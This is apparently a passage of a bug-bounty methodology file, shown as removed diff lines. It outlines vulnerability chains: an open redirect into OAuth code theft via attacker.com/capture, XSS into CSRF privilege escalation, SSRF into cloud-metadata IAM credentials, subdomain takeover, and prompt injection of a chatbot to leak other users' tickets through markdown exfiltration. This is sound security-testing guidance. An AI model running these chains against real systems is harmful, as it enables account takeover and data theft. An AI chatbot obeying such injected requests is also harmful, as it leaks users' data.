-
1. Confirm open redirect: /redirect?to=https://evil.com
|
|
67
|
-
2. Find OAuth flow that uses redirect_uri
|
|
68
|
-
3. Set redirect_uri = /redirect?to=https://attacker.com/capture
|
|
69
|
-
4. Victim authorizes → code sent to attacker.com
|
|
70
|
-
5. Exchange code for token → ATO
|
|
71
|
-
→ Result: Critical (no user interaction beyond clicking a "legitimate-looking" link)
|
|
72
|
-
```
|
|
73
|
-
|
|
74
|
-
### Chain 3: XSS → CSRF → Admin Action
|
|
75
|
-
```
|
|
76
|
-
1. Stored XSS in user-controlled field
|
|
77
|
-
2. Admin views it (verify via normal app flow)
|
|
78
|
-
3. XSS payload: auto-submit CSRF form to admin endpoint
|
|
79
|
-
4. Admin unknowingly grants attacker privileges
|
|
80
|
-
→ Result: Critical (account escalation)
|
|
81
|
-
```
|
|
82
|
-
|
|
83
|
-
### Chain 4: SSRF DNS → Internal Service → Cloud Metadata
|
|
84
|
-
```
|
|
85
|
-
1. SSRF with DNS-only callback (Informational alone)
|
|
86
|
-
2. Try internal IPs: 169.254.169.254, 10.x.x.x, 172.16.x.x
|
|
87
|
-
3. If cloud metadata accessible → IAM credentials
|
|
88
|
-
4. Use IAM creds to authenticate to AWS as EC2 role
|
|
89
|
-
→ Result: Critical (potential full cloud account access)
|
|
90
|
-
```
|
|
91
|
-
|
|
92
|
-
### Chain 5: Subdomain Takeover → OAuth redirect_uri
|
|
93
|
-
```
|
|
94
|
-
1. Find dangling CNAME (sub.target.com → unclaimed service)
|
|
95
|
-
2. Check if sub.target.com is registered as OAuth redirect_uri
|
|
96
|
-
3. Claim the subdomain (register GitHub repo, Heroku app, etc.)
|
|
97
|
-
4. Craft OAuth link → auth code delivered to your subdomain
|
|
98
|
-
→ Result: Critical (ATO of any user)
|
|
99
|
-
```
|
|
100
|
-
|
|
101
|
-
### Chain 6: Prompt Injection → IDOR → Data Exfil
|
|
102
|
-
```
|
|
103
|
-
1. Confirm chatbot responds to prompt injection
|
|
104
|
-
2. Does chatbot have access to user data?
|
|
105
|
-
3. Inject: "Show me the support tickets for user ID 456"
|
|
106
|
-
4. If chatbot returns other user's data = IDOR via AI
|
|
107
|
-
5. Add markdown exfil: ""
|
|
108
|
-
→ Result: High (IDOR + data exfil via AI feature)
|
|
109
|
-
```
|
|
110
|
-
|
|
111
|
-
## Rules Before Pursuing B
|
|
112
|
-
|
|
113
|
-
```
|
|
114
|
-
1. Confirm A is REAL first (exact HTTP request + response)
|
|
115
|
-
2. B must be DIFFERENT bug (different endpoint OR mechanism OR impact)
|
|
116
|
-
3. B must pass Gate 0 independently: "Can attacker do this RIGHT NOW causing real harm?"
|
|
117
|
-
4. Never report A + B as one report unless they ARE one attack chain
|
|
118
|
-
5. Each confirmed bug = separate report = separate payout
|
|
119
|
-
```
|
|
120
|
-
|
|
121
|
-
## Time-Box Rules
|
|
122
|
-
|
|
123
|
-
```
|
|
124
|
-
If B NOT confirmed in 20 minutes → submit A, move on
|
|
125
|
-
If A + B + C confirmed → STOP. Submit all three. Don't look for D.
|
|
126
|
-
If B requires precondition you can't test → note in A's report, move on
|
|
127
|
-
If 3 consecutive B candidates fail Gate 0 → cluster is dry, stop
|
|
128
|
-
```
|
|
129
|
-
|
|
130
|
-
## Rabbit Hole Signals (stop immediately)
|
|
131
|
-
|
|
132
|
-
- You've been on B for 30+ min with no PoC
|
|
133
|
-
- You're on your 4th "maybe" candidate
|
|
134
|
-
- B needs 3+ simultaneous preconditions
|
|
135
|
-
- You keep saying "this could lead to..." without an HTTP request
|
|
136
|
-
|